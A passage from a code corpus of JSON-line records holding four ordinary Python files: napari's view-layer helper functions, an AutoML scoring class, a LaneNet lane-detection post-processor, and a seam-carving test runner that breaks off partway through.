+{"seq_id":"484884253","text":"\"\"\"Methods to create a new viewer instance then add a particular layer type.\n\nAll functions follow this pattern, (where is replaced with one\nof the layer types, like \"image\", \"points\", etc...):\n\n.. code-block:: python\n\n def view_(*args, **kwargs):\n # ... pop all of the viewer kwargs out of kwargs into viewer_kwargs\n viewer = Viewer(**viewer_kwargs)\n add_method = getattr(viewer, f\"add_{}\")\n add_method(*args, **kwargs)\n return viewer\n\"\"\"\nimport inspect\n\nfrom numpydoc.docscrape import NumpyDocString as _NumpyDocString\n\nfrom .viewer import Viewer\n\n__all__ = [\n 'view_image',\n 'view_labels',\n 'view_path',\n 'view_points',\n 'view_shapes',\n 'view_surface',\n 'view_tracks',\n 'view_vectors',\n]\n\n_doc_template = \"\"\"Create a viewer and add a{n} {layer_string} layer.\n\n{params}\n\nReturns\n-------\nviewer : :class:`napari.Viewer`\n The newly-created viewer.\n\"\"\"\n\n_VIEW_DOC = _NumpyDocString(Viewer.__doc__)\n_VIEW_PARAMS = \" \" + \"\\n\".join(_VIEW_DOC._str_param_list('Parameters')[2:])\n\n\ndef _merge_docstrings(add_method, layer_string):\n # create combined docstring with parameters from add_* and Viewer methods\n import textwrap\n\n add_method_doc = _NumpyDocString(add_method.__doc__)\n\n # this ugliness is because the indentation of the parsed numpydocstring\n # is different for the first parameter :(\n lines = add_method_doc._str_param_list('Parameters')\n lines = lines[:3] + textwrap.dedent(\"\\n\".join(lines[3:])).splitlines()\n params = \"\\n\".join(lines) + \"\\n\" + textwrap.dedent(_VIEW_PARAMS)\n n = 'n' if layer_string.startswith(tuple('aeiou')) else ''\n return _doc_template.format(n=n, layer_string=layer_string, params=params)\n\n\ndef _merge_layer_viewer_sigs_docs(func):\n \"\"\"Make combined signature, docstrings, and annotations for `func`.\n\n This is a decorator that combines information from `Viewer.__init__`,\n and one of the `viewer.add_*` methods. 
It updates the docstring,\n signature, and type annotations of the decorated function with the merged\n versions.\n\n Parameters\n ----------\n func : callable\n `view_` function to modify\n\n Returns\n -------\n func : callable\n The same function, with merged metadata.\n \"\"\"\n from .utils.misc import _combine_signatures\n\n # get the `Viewer.add_*` method\n layer_string = func.__name__.replace(\"view_\", \"\")\n if layer_string == 'path':\n add_method = Viewer.open\n else:\n add_method = getattr(Viewer, f'add_{layer_string}')\n\n # merge the docstrings of Viewer and viewer.add_*\n func.__doc__ = _merge_docstrings(add_method, layer_string)\n\n # merge the signatures of Viewer and viewer.add_*\n func.__signature__ = _combine_signatures(\n add_method, Viewer, return_annotation=Viewer, exclude=('self',)\n )\n\n # merge the __annotations__\n func.__annotations__ = {\n **add_method.__annotations__,\n **Viewer.__init__.__annotations__,\n 'return': Viewer,\n }\n\n # _forwardrefns_ is used by stubgen.py to populate the globalns\n # when evaluate forward references with get_type_hints\n func._forwardrefns_ = {**add_method.__globals__}\n return func\n\n\n_viewer_params = inspect.signature(Viewer).parameters\n\n\ndef _make_viewer_then(add_method: str, args, kwargs) -> Viewer:\n \"\"\"Utility function that creates a viewer, adds a layer, returns viewer.\"\"\"\n vkwargs = {k: kwargs.pop(k) for k in list(kwargs) if k in _viewer_params}\n viewer = Viewer(**vkwargs)\n if 'kwargs' in kwargs:\n kwargs.update(kwargs.pop(\"kwargs\"))\n method = getattr(viewer, add_method)\n method(*args, **kwargs)\n return viewer\n\n\n# Each of the following functions will have this pattern:\n#\n# def view_image(*args, **kwargs):\n# # ... pop all of the viewer kwargs out of kwargs into viewer_kwargs\n# viewer = Viewer(**viewer_kwargs)\n# viewer.add_image(*args, **kwargs)\n# return viewer\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_image(*args, **kwargs):\n return _make_viewer_then('add_image', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_labels(*args, **kwargs):\n return _make_viewer_then('add_labels', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_points(*args, **kwargs):\n return _make_viewer_then('add_points', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_shapes(*args, **kwargs):\n return _make_viewer_then('add_shapes', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_surface(*args, **kwargs):\n return _make_viewer_then('add_surface', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_tracks(*args, **kwargs):\n return _make_viewer_then('add_tracks', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_vectors(*args, **kwargs):\n return _make_viewer_then('add_vectors', args, kwargs)\n\n\n@_merge_layer_viewer_sigs_docs\ndef view_path(*args, **kwargs):\n return _make_viewer_then('open', args, kwargs)\n","sub_path":"napari/view_layers.py","file_name":"view_layers.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"158618596","text":"import pandas as pd\nimport json\nfrom bi.algorithms.autoML.data_validation import DataValidation\nfrom bi.algorithms.autoML.data_preprocessing_auto_ml import DataPreprocessingAutoML\nfrom bi.algorithms.autoML.feature_engineering_auto_ml import FeatureEngineeringAutoML\nfrom bi.algorithms.autoML.feature_selection import FeatureSelection\nfrom bi.algorithms import utils as MLUtils\nclass Scoring(object):\n\n def __init__(self, df, train_json, pandas_flag):\n print (\"Auto ML score Running \"*10)\n self.data_frame = df\n self.train_json = train_json\n self._pandas_flag = pandas_flag\n\n\n def run(self):\n if len(self.train_json['MeasureColsToDim']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.dimension_measure_test(self.train_json['MeasureColsToDim'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n if len(self.train_json['MeanImputeCols']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.measure_col_imputation(self.train_json['MeanImputeCols'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n if len(self.train_json['ModeImputeCols']) > 0:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.dim_col_imputation(self.train_json['ModeImputeCols'])\n self.data_frame = DataPreprocessingAutoML_obj.data_frame\n try:\n DataPreprocessingAutoML_obj.test_data_imputation()\n except:\n DataPreprocessingAutoML_obj = DataPreprocessingAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n DataPreprocessingAutoML_obj.test_data_imputation()\n FeatureEngineeringAutoML_obj = FeatureEngineeringAutoML(self.data_frame, None, {}, [], [], [], None, self._pandas_flag)\n if len(self.train_json['date_column_split']) > 0:\n FeatureEngineeringAutoML_obj.date_column_split(self.train_json['date_column_split'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n if len(self.train_json['one_hot_encoded']) > 0:\n if self._pandas_flag:\n FeatureEngineeringAutoML_obj.sk_one_hot_encoding(self.train_json['one_hot_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n else:\n FeatureEngineeringAutoML_obj.pyspark_one_hot_encoding(self.train_json['one_hot_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n if len(self.train_json['label_encoded']) > 0:\n if not self._pandas_flag:\n FeatureEngineeringAutoML_obj.pyspark_label_encoding(self.train_json['label_encoded'])\n self.data_frame = FeatureEngineeringAutoML_obj.data_frame\n\n #score_df = self.data_frame[list(set(self.train_json['SelectedColsTree'])-set(self.train_json['target']))]\n final_list_linear=self.train_json['SelectedColsLinear']\n final_list_tree=self.train_json['SelectedColsTree']\n final_list_linear.remove(self.train_json['target'])\n final_list_tree.remove(self.train_json['target'])\n if self._pandas_flag:\n score_df_linear = MLUtils.fill_missing_columns(self.data_frame,final_list_linear,self.train_json['target'])\n score_df_tree = MLUtils.fill_missing_columns(self.data_frame,final_list_tree,self.train_json['target'])\n else:\n score_df_linear = MLUtils.fill_missing_columns_pys(self.data_frame,final_list_linear,self.train_json['target'], self._pandas_flag)\n score_df_tree = 
MLUtils.fill_missing_columns_pys(self.data_frame,final_list_tree,self.train_json['target'], self._pandas_flag)\n return score_df_linear, score_df_tree\n","sub_path":"bi/algorithms/autoML/auto_ml_score1.py","file_name":"auto_ml_score1.py","file_ext":"py","file_size_in_byte":4016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"92951571","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time : 18-5-30 上午10:04\n# @Author : MaybeShewill-CV\n# @Site : https://github.com/MaybeShewill-CV/lanenet-lane-detection\n# @File : lanenet_postprocess.py\n# @IDE: PyCharm Community Edition\n\"\"\"\nLaneNet model post process\n\"\"\"\nimport os\nimport math\nimport cv2\nimport glog as log\nimport numpy as np\nimport datetime\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.preprocessing import StandardScaler\nfrom config import global_config\n\n# log.setLevel(\"DEBUG\")\n\nCFG = global_config.cfg\n\n\ndef _morphological_process(image, kernel_size=5):\n \"\"\"\n morphological process to fill the hole in the binary segmentation result\n :param image:\n :param kernel_size:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n raise ValueError('Binary segmentation result image should be a single channel image')\n\n if image.dtype is not np.uint8:\n image = np.array(image, np.uint8)\n\n kernel = cv2.getStructuringElement(shape=cv2.MORPH_ELLIPSE, ksize=(kernel_size, kernel_size))\n\n # close operation fille hole\n closing = cv2.morphologyEx(image, cv2.MORPH_CLOSE, kernel, iterations=1)\n\n return closing\n\n\ndef _connect_components_analysis(image):\n \"\"\"\n connect components analysis to remove the small components\n :param image:\n :return:\n \"\"\"\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)\n\n\nclass _LaneFeat(object):\n \"\"\"\n\n \"\"\"\n def __init__(self, feat, coord, class_id=-1):\n \"\"\"\n lane feat object\n :param feat: lane embeddng feats [feature_1, feature_2, ...]\n :param coord: lane coordinates [x, y]\n :param class_id: lane class id\n \"\"\"\n self._feat = feat\n self._coord = coord\n self._class_id = class_id\n\n @property\n def feat(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._feat\n\n @feat.setter\n def feat(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.ndarray):\n value = np.array(value, dtype=np.float64)\n\n if value.dtype != np.float32:\n value = np.array(value, dtype=np.float64)\n\n self._feat = value\n\n @property\n def coord(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._coord\n\n @coord.setter\n def coord(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.ndarray):\n value = np.array(value)\n\n if value.dtype != np.int32:\n value = np.array(value, dtype=np.int32)\n\n self._coord = value\n\n @property\n def class_id(self):\n \"\"\"\n\n :return:\n \"\"\"\n return self._class_id\n\n @class_id.setter\n def class_id(self, value):\n \"\"\"\n\n :param value:\n :return:\n \"\"\"\n if not isinstance(value, np.int64):\n raise ValueError('Class id must be integer')\n\n self._class_id = value\n\n\nclass _LaneNetCluster(object):\n \"\"\"\n Instance segmentation result cluster\n \"\"\"\n\n def __init__(self):\n \"\"\"\n\n \"\"\"\n self._color_map = [np.array([255, 0, 0]),\n np.array([0, 255, 0]),\n np.array([0, 0, 255]),\n np.array([125, 125, 0]),\n np.array([0, 125, 125]),\n np.array([125, 0, 125]),\n np.array([50, 100, 50]),\n np.array([100, 50, 100])]\n\n @staticmethod\n def _embedding_feats_dbscan_cluster(embedding_image_feats):\n \"\"\"\n dbscan cluster\n :param embedding_image_feats:\n :return:\n \"\"\"\n db = DBSCAN(eps=CFG.POSTPROCESS.DBSCAN_EPS, min_samples=CFG.POSTPROCESS.DBSCAN_MIN_SAMPLES)\n try:\n features = 
StandardScaler().fit_transform(embedding_image_feats)\n db.fit(features)\n except Exception as err:\n log.error(err)\n ret = {\n 'origin_features': None,\n 'cluster_nums': 0,\n 'db_labels': None,\n 'unique_labels': None,\n 'cluster_center': None\n }\n return ret\n db_labels = db.labels_\n unique_labels = np.unique(db_labels)\n\n num_clusters = len(unique_labels)\n cluster_centers = db.components_\n\n ret = {\n 'origin_features': features,\n 'cluster_nums': num_clusters,\n 'db_labels': db_labels,\n 'unique_labels': unique_labels,\n 'cluster_center': cluster_centers\n }\n\n return ret\n\n @staticmethod\n def _get_lane_embedding_feats(binary_seg_ret, instance_seg_ret):\n \"\"\"\n get lane embedding features according the binary seg result\n :param binary_seg_ret:\n :param instance_seg_ret:\n :return:\n \"\"\"\n idx = np.where(binary_seg_ret == 255)\n lane_embedding_feats = instance_seg_ret[idx]\n # idx_scale = np.vstack((idx[0] / 256.0, idx[1] / 512.0)).transpose()\n # lane_embedding_feats = np.hstack((lane_embedding_feats, idx_scale))\n lane_coordinate = np.vstack((idx[1], idx[0])).transpose()\n\n assert lane_embedding_feats.shape[0] == lane_coordinate.shape[0]\n\n ret = {\n 'lane_embedding_feats': lane_embedding_feats,\n 'lane_coordinates': lane_coordinate\n }\n\n return ret\n\n def apply_lane_feats_cluster(self, binary_seg_result, instance_seg_result):\n \"\"\"\n\n :param binary_seg_result:\n :param instance_seg_result:\n :return:\n \"\"\"\n # get embedding feats and coords\n get_lane_embedding_feats_result = self._get_lane_embedding_feats(\n binary_seg_ret=binary_seg_result,\n instance_seg_ret=instance_seg_result\n )\n\n # dbscan cluster\n dbscan_cluster_result = self._embedding_feats_dbscan_cluster(\n embedding_image_feats=get_lane_embedding_feats_result['lane_embedding_feats']\n )\n\n mask = np.zeros(shape=[binary_seg_result.shape[0], binary_seg_result.shape[1], 3], dtype=np.uint8)\n db_labels = dbscan_cluster_result['db_labels']\n unique_labels = dbscan_cluster_result['unique_labels']\n coord = get_lane_embedding_feats_result['lane_coordinates']\n\n if db_labels is None:\n return None, None\n\n lane_coords = []\n\n for index, label in enumerate(unique_labels.tolist()):\n if label == -1:\n continue\n idx = np.where(db_labels == label)\n pix_coord_idx = tuple((coord[idx][:, 1], coord[idx][:, 0]))\n mask[pix_coord_idx] = self._color_map[index]\n lane_coords.append(coord[idx])\n\n return mask, lane_coords\n\n\nclass LaneNetPostProcessor(object):\n \"\"\"\n lanenet post process for lane generation\n \"\"\"\n # def __init__(self, ipm_remap_file_path='./data/tusimple_ipm_remap.yml'):\n # absolute path is given because there was a path problem in lanenet api\n def __init__(self, ipm_remap_file_path='/codehub/external/lanenet-lane-detection/data/tusimple_ipm_remap.yml'):\n \"\"\"\n\n :param ipm_remap_file_path: ipm generate file path\n \"\"\"\n assert os.path.exists(ipm_remap_file_path), '{:s} not exist'.format(ipm_remap_file_path)\n\n self._cluster = _LaneNetCluster()\n self._ipm_remap_file_path = ipm_remap_file_path\n\n remap_file_load_ret = self._load_remap_matrix()\n self._remap_to_ipm_x = remap_file_load_ret['remap_to_ipm_x']\n self._remap_to_ipm_y = remap_file_load_ret['remap_to_ipm_y']\n\n self._color_map = [np.array([255, 0, 0]),\n np.array([0, 255, 0]),\n np.array([0, 0, 255]),\n np.array([125, 125, 0]),\n np.array([0, 125, 125]),\n np.array([125, 0, 125]),\n np.array([50, 100, 50]),\n np.array([100, 50, 100])]\n\n def _load_remap_matrix(self):\n \"\"\"\n\n :return:\n \"\"\"\n fs = 
cv2.FileStorage(self._ipm_remap_file_path, cv2.FILE_STORAGE_READ)\n\n remap_to_ipm_x = fs.getNode('remap_ipm_x').mat()\n remap_to_ipm_y = fs.getNode('remap_ipm_y').mat()\n\n ret = {\n 'remap_to_ipm_x': remap_to_ipm_x,\n 'remap_to_ipm_y': remap_to_ipm_y,\n }\n\n fs.release()\n\n return ret\n\n def postprocess(self, image_name, binary_seg_result, instance_seg_result=None,\n min_area_threshold=100, source_image=None, \n data_source='tusimple'):\n \"\"\"\n\n :param image_name:\n :param binary_seg_result:\n :param instance_seg_result:\n :param min_area_threshold:\n :param source_image:\n :param data_source:\n :return:\n \"\"\"\n ret = {\n 'mask_image': None,\n 'fit_params': None,\n 'source_image': source_image,\n 'pred_json' : {\n 'x_axis' : [],\n 'y_axis' : [],\n 'image_name' : image_name,\n 'run_time' : 0\n } \n }\n\n x = 0\n y = 0\n\n # timestamp = (\"{:%d%m%y_%H%M%S}\").format(datetime.datetime.now())\n # debug_image_dir = '/aimldl-dat/logs/lanenet/debug'\n # debug_image_path = os.path.join(debug_image_dir,timestamp)\n # os.makedirs(debug_image_path)\n \n # convert binary_seg_result\n binary_seg_result = np.array(binary_seg_result * 255, dtype=np.uint8)\n\n # apply image morphology operation to fill in the hold and reduce the small area\n morphological_ret = _morphological_process(binary_seg_result, kernel_size=5)\n\n connect_components_analysis_ret = _connect_components_analysis(image=morphological_ret)\n\n labels = connect_components_analysis_ret[1]\n\n stats = connect_components_analysis_ret[2]\n for index, stat in enumerate(stats):\n if stat[4] <= min_area_threshold:\n idx = np.where(labels == index)\n morphological_ret[idx] = 0\n\n # apply embedding features cluster\n mask_image, lane_coords = self._cluster.apply_lane_feats_cluster(\n binary_seg_result=morphological_ret,\n instance_seg_result=instance_seg_result\n )\n \n # mask_image_path = os.path.join(debug_image_path,\"mask_image.png\")\n # cv2.imwrite(mask_image_path,mask_image)\n \n source_image_height = source_image.shape[0]\n source_image_width = source_image.shape[1]\n\n if mask_image is None:\n ret['mask_image'] = None\n ret['fit_params'] = None\n else:\n # lane line fit\n fit_params = []\n src_lane_pts = []\n tmp_ipm_image = cv2.remap(\n source_image,\n self._remap_to_ipm_x,\n self._remap_to_ipm_y,\n interpolation=cv2.INTER_NEAREST\n )\n \n # lane pts every single lane\n for lane_index, coords in enumerate(lane_coords):\n if data_source == 'tusimple':\n # tmp_mask = np.zeros(shape=(590, 1640), dtype=np.uint8)\n tmp_mask = np.zeros(shape=(720, 1280), dtype=np.uint8)\n # tmp_mask = np.zeros(shape=(1080, 1920), dtype=np.uint8)\n # tmp_mask[tuple((np.int_(coords[:, 1] * 590 / 256), np.int_(coords[:, 0] * 1640 / 512)))] = 255\n tmp_mask[tuple((np.int_(coords[:, 1] * 720 / 256), np.int_(coords[:, 0] * 1280 / 512)))] = 255\n # tmp_mask[tuple((np.int_(coords[:, 1] * 1080 / 256), np.int_(coords[:, 0] * 1920 / 512)))] = 255\n elif data_source == 'beec_ccd':\n tmp_mask = np.zeros(shape=(1350, 2448), dtype=np.uint8)\n tmp_mask[tuple((np.int_(coords[:, 1] * 1350 / 256), np.int_(coords[:, 0] * 2448 / 512)))] = 255\n else:\n raise ValueError('Wrong data source now only support tusimple and beec_ccd')\n \n # tmp_mask_path = os.path.join(debug_image_path,\"tmp_mask.png\")\n # cv2.imwrite(tmp_mask_path,tmp_mask)\n \n tmp_ipm_mask = cv2.remap(\n tmp_mask,\n self._remap_to_ipm_x,\n self._remap_to_ipm_y,\n interpolation=cv2.INTER_NEAREST\n )\n \n # tmp_ipm_mask_path = os.path.join(debug_image_path,\"tmp_ipm_mask.png\")\n # 
cv2.imwrite(tmp_ipm_mask_path,tmp_ipm_mask)\n\n nonzero_y = np.array(tmp_ipm_mask.nonzero()[0])\n nonzero_x = np.array(tmp_ipm_mask.nonzero()[1])\n\n log.debug(\"nonzero_y : {}\".format(nonzero_y))\n log.debug(\"max of nonzero_y : {}\".format(np.max(nonzero_y)))\n log.debug(\"min of nonzero_y : {}\".format(np.min(nonzero_y)))\n\n log.debug(\"nonzero_x : {}\".format(nonzero_x))\n log.debug(\"max of nonzero_x : {}\".format(np.max(nonzero_x)))\n log.debug(\"min of nonzero_x : {}\".format(np.min(nonzero_x)))\n\n # for index,val in enumerate(nonzero_x):\n # lane_color = self._color_map[lane_index].tolist()\n # cv2.circle(tmp_ipm_image, (nonzero_x[index],nonzero_y[index]), 5, lane_color, -1)\n\n bbox = []\n src_x = self._remap_to_ipm_x[np.min(nonzero_y),np.min(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.min(nonzero_y),np.min(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.min(nonzero_y),np.max(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.min(nonzero_y),np.max(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.max(nonzero_y),np.max(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.max(nonzero_y),np.max(nonzero_x)]\n bbox.append([src_x, src_y])\n\n src_x = self._remap_to_ipm_x[np.max(nonzero_y),np.min(nonzero_x)]\n src_y = self._remap_to_ipm_y[np.max(nonzero_y),np.min(nonzero_x)]\n bbox.append([src_x, src_y])\n\n log.debug(\"bbox : {}\".format(bbox))\n\n min_y = min(bbox[0][1],bbox[3][1])\n log.debug(\"min_y : {}\".format(min_y))\n\n max_y = max(bbox[1][1],bbox[2][1])\n log.debug(\"max_y : {}\".format(max_y))\n\n fit_param = np.polyfit(nonzero_y, nonzero_x, 2)\n fit_params.append(fit_param)\n log.debug(\"fit_params : {}\".format(fit_params))\n\n [ipm_image_height, ipm_image_width] = tmp_ipm_mask.shape\n plot_y = np.linspace(10, ipm_image_height, ipm_image_height - 10)\n log.debug(\"plot_y : {}\".format(plot_y))\n \n fit_x = fit_param[0] * plot_y ** 2 + fit_param[1] * plot_y + fit_param[2]\n # fit_x = fit_param[0] * plot_y ** 3 + fit_param[1] * plot_y ** 2 + fit_param[2] * plot_y + fit_param[3]\n log.debug(\"fit_x : {}\".format(fit_x))\n\n lane_pts = []\n for index in range(0, plot_y.shape[0], 5):\n src_x = self._remap_to_ipm_x[\n int(plot_y[index]), int(np.clip(fit_x[index], 0, ipm_image_width - 1))]\n if src_x <= 0:\n continue\n src_y = self._remap_to_ipm_y[\n int(plot_y[index]), int(np.clip(fit_x[index], 0, ipm_image_width - 1))]\n if src_y < min_y:\n continue\n # if src_y > max_y:\n # continue\n\n src_y = src_y if src_y > 0 else 0\n\n lane_pts.append([src_x, src_y])\n log.debug(\"lane_pts : {}\".format(lane_pts))\n\n src_lane_pts.append(lane_pts)\n log.debug(\"src_lane_pts : {}\".format(src_lane_pts))\n\n lane_img = np.zeros(shape=(source_image_height,source_image_width*3,3), dtype=np.uint8)\n # debug_image_path is only created in the commented-out debug block above, so these writes stay disabled with the rest of the debug output\n # tmp_ipm_image_path = os.path.join(debug_image_path,\"tmp_ipm_image.png\")\n # cv2.imwrite(tmp_ipm_image_path,tmp_ipm_image)\n\n for index,lane_pt in enumerate(src_lane_pts):\n for i in lane_pt:\n log.debug(\"i[0] = {}, i[1] = {}\".format(int(i[0]),int(i[1])))\n lane_color = self._color_map[index].tolist()\n cv2.circle(lane_img, (int(i[0]),int(i[1])), 15, lane_color, -1)\n\n # lane_img_path = os.path.join(debug_image_path,\"lane_img.png\")\n # cv2.imwrite(lane_img_path,lane_img)\n\n all_lane_x = [] \n all_lane_y = [] \n\n # tusimple test data sample point along y axis every 10 pixels\n for index, single_lane_pts in enumerate(src_lane_pts):\n\n single_lane_pt_x = np.array(single_lane_pts, dtype=np.float32)[:, 0]\n single_lane_pt_y = np.array(single_lane_pts, dtype=np.float32)[:, 1]\n if data_source == 'tusimple':\n # start_plot_y = 240\n start_plot_y = 160\n end_plot_y = 720\n elif data_source == 'beec_ccd':\n start_plot_y = 820\n end_plot_y = 1350\n else:\n raise ValueError('Wrong data source now only support tusimple and beec_ccd')\n step = int(math.floor((end_plot_y - start_plot_y) / 10)) \n single_lane_x = []\n single_lane_y = []\n for plot_y in np.linspace(start_plot_y, end_plot_y, step):\n log.debug(\"plot_y : {}\".format(plot_y))\n diff = single_lane_pt_y - plot_y\n fake_diff_bigger_than_zero = diff.copy()\n fake_diff_smaller_than_zero = diff.copy()\n fake_diff_bigger_than_zero[np.where(diff <= 0)] = float('inf')\n fake_diff_smaller_than_zero[np.where(diff > 0)] = float('-inf')\n idx_low = np.argmax(fake_diff_smaller_than_zero)\n idx_high = np.argmin(fake_diff_bigger_than_zero)\n\n previous_src_pt_x = single_lane_pt_x[idx_low]\n previous_src_pt_y = single_lane_pt_y[idx_low]\n last_src_pt_x = single_lane_pt_x[idx_high]\n last_src_pt_y = single_lane_pt_y[idx_high]\n\n if previous_src_pt_y < start_plot_y or last_src_pt_y < start_plot_y or \\\n fake_diff_smaller_than_zero[idx_low] == float('-inf') or \\\n fake_diff_bigger_than_zero[idx_high] == float('inf'):\n continue\n\n interpolation_src_pt_x = (abs(previous_src_pt_y - plot_y) * previous_src_pt_x +\n abs(last_src_pt_y - plot_y) * last_src_pt_x) / \\\n (abs(previous_src_pt_y - plot_y) + abs(last_src_pt_y - plot_y))\n log.debug(\"i_x : {}, p_x : {}, l_x : {}\".format(interpolation_src_pt_x,previous_src_pt_x,last_src_pt_x))\n interpolation_src_pt_y = (abs(previous_src_pt_y - plot_y) * previous_src_pt_y +\n abs(last_src_pt_y - plot_y) * last_src_pt_y) / \\\n (abs(previous_src_pt_y - plot_y) + abs(last_src_pt_y - plot_y))\n log.debug(\"i_y : {}, p_y : {}, l_y : {}\".format(interpolation_src_pt_y,previous_src_pt_y,last_src_pt_y))\n \n if interpolation_src_pt_x > source_image_width or interpolation_src_pt_x < 10:\n continue\n \n \n lane_color = self._color_map[index].tolist()\n cv2.circle(source_image, (int(interpolation_src_pt_x),\n int(interpolation_src_pt_y)), 5, lane_color, -1)\n \n \n # math.ceil also returns an integer instead of a float\n # To rescale it back to 1920*1080\n # x = math.ceil(interpolation_src_pt_x*1.5)\n # y = math.ceil(interpolation_src_pt_y*1.5)\n \n x = math.ceil(interpolation_src_pt_x)\n y = math.ceil(interpolation_src_pt_y)\n\n single_lane_x.append(x)\n single_lane_y.append(y)\n\n all_lane_x.append(single_lane_x)\n all_lane_y.append(single_lane_y)\n\n ret['mask_image'] = mask_image\n ret['fit_params'] = fit_params\n ret['source_image'] = source_image\n ## overriding the keys, careful\n ret['pred_json'] = {\n 'x_axis' : all_lane_x,\n 'y_axis' : all_lane_y,\n 'image_name' : image_name,\n 'run_time' : -1\n }\n\n log.debug(\"ret : {}\".format(ret))\n return ret\n ","sub_path":"lanenet_model/lanenet_postprocess_vLine.py","file_name":"lanenet_postprocess_vLine.py","file_ext":"py","file_size_in_byte":21590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"404899170","text":"#!/usr/bin/env python2\n# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4\n\nfrom __future__ import print_function\n\nif (__name__ == '__main__'):\n import argparse\n import os\n import re\n import subprocess\n import sys\n import threading\n\n class TimeoutError(Exception):\n pass\n\n class Command(object):\n def __init__(self, cmd):\n self.cmd = cmd\n self.process = None\n self.out = None\n self.err = None\n\n def run(self):\n def target():\n self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n self.out, self.err = self.process.communicate()\n\n thread = threading.Thread(target=target)\n thread.start()\n thread.join(timeout=10)\n if thread.is_alive():\n self.process.terminate()\n thread.join()\n raise TimeoutError\n\n return (self.process.returncode, self.out, self.err)\n\n cwd = os.path.dirname(os.path.abspath(__file__))\n defaultTestDir = cwd\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--filter', type=str, metavar='', help='only execute tests matching this regex')\n parser.add_argument('-l', '--list', action='store_true', help='only list tests, don\\'t execute')\n\n args = parser.parse_args()\n\n test_filter = None\n if args.filter:\n test_filter = re.compile(args.filter)\n\n tests = {\n 'pub.statistics_invalidinput.imgbroken1',\n 'pub.statistics_invalidinput.imgbroken2',\n 'pub.statistics.small1',\n 'pub.statistics.small2',\n 'pub.statistics.owl',\n 'pub.min_path.small1',\n 'pub.min_path.small2',\n 'pub.min_path.owl',\n 'pub.carve.small1_0',\n 'pub.carve.small1_1',\n 'pub.carve.small2_0',\n 'pub.carve.small2_1',\n }\n\n all_tests = []\n\n for test in tests:\n if not test_filter or test_filter.match(test):\n all_tests.append(test)\n all_tests.sort()\n\n if args.list:\n for test in all_tests:\n print(test)\n exit(0)\n\n binary = \"build/carve\"\n\n if not (os.path.isfile(binary) and os.access(binary, os.X_OK)):\n print(\"'%s' is not a file or not executable\" % binary)\n exit(1)\n\n def run(args):\n cmd = Command([binary] + args)\n return cmd.run()\n\n def test_statistics_invalidinput(case):\n args = ['-s', 'data/' + case + '.ppm']\n rc, out, err = run(args)\n if rc == 1:\n if err == \"\":\n return None\n else:\n return '\\n' + err\n else:\n return 'application did not return EXIT_FAILURE\\n' + err\n\n def test_statistics(case):\n args = ['-s', 'data/' + case + '.ppm']\n ref = 'test_data/' + case + '.statistics'\n rc, out, err = run(args)\n if rc == 0:\n if out == open(ref, 'r').read():\n return None\n else:\n return 'incorrect statistics'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def test_min_path(case):\n args = ['-p', 'data/' + case + '.ppm']\n ref = 'test_data/' + case + '.path'\n rc, out, err = run(args)\n if rc == 0:\n if out == open(ref, 'r').read():\n return None\n else:\n return 'incorrect minimal path'\n else:\n return 'application did not return EXIT_SUCCESS\\n' + err\n\n def img_cmp(img1_name, img2_name):\n img1 = \"\".join(open(img1_name, 'r').read().split())\n img2 = \"\".join(open(img2_name, 'r').read().split())\n return img1 == img2\n\n def test_carve(case):\n if os.access('out.ppm', os.W_OK):\n os.remove('out.ppm')\n\n base, num = case.split('_', 1)\n src_img = 'data/' + base + '.ppm'\n ref = 'test_data/' + case + '.ppm'\n args = ['-n', num, src_img]\n rc, out, err = run(args)\n if rc == 0:\n if not os.access('out.ppm', os.R_OK):\n return 'no \"out.ppm\" produced\\n' + err\n if img_cmp('out.ppm', ref):\n return None\n 
